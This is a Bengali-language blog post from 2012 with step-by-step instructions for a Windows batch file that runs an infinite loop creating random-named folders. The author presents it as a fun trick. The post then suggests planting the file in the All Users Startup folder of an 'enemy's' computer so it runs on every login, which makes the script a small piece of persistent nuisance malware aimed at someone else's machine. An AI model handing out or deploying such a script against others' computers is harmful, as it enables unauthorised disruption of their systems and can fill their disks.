Pages

Ads 468x60px

Related Posts Plugin for WordPress, Blogger...

শনিবার, ২৮ জুলাই, ২০১২

ফোল্ডারের বন্যা !!!

কয়েক সেকেন্ডেই ১,০০০ ফোল্ডার তৈরি করুন !!!

 

অবাক হওয়ার কিছু নাই; খুবই সহজ । যাষ্ট একটি নোটপেড ওপেন করতে হবে;
প্রথমে Start মেনু থেকে Run এ ক্লিক করুন অথবা Win+R বাটন প্রেস করুন।
এরপর notepad লিখে ইন্টার বাটন চাপুন অথবা OK তে ক্লিক করুন।
এবার notepad ওপেন হলে সেখানে নিচের কোডটুকু কপি করে পেষ্ট করুন।


@echo off
:top
md %random%
goto top



এবার এই ফাইলটা সেভ (Ctrl+S) করুন shohel.bat নামে। মানে যেই নামেই সেভ করুন না কেন তার পর .bat দিতে হবে।


কাজ শেষ এবার শুধু এই ফাইলে ডাবল ক্লিক করে মজা দেখুন ; কয়েক সেকেন্ডেই হাজারেরও বেশী ফোল্ডার তৈরি হয়ে যাবে।


সাবধান : ভুলেও ডেস্কটপে ফাইলটা রাখবেন না। তাহলে ডেস্কটপেই ফোল্ডার তৈরি হওয়া শুরু করবে। যেকোন ড্রাইভে বা ফোল্ডারে রেখে ডাবল ক্লিক করবেন।


তবে হ্যা আপনার শত্রুর কম্পিউটার এ যদি কিছু ঘটাতে চান তবে

C:\Documents and Settings\All Users\Start Menu\Programs\Startup

এই লোকেশনে গিয়ে ফাইলটা রেখে আসুন। মনের ভুলে আবার নিজের পিসিতে রেখে দিয়েন না। :P
ধন্যবাদ সবাইকে; ভাল থাকবেন।

 

কোন মন্তব্য নেই:

একটি মন্তব্য পোস্ট করুন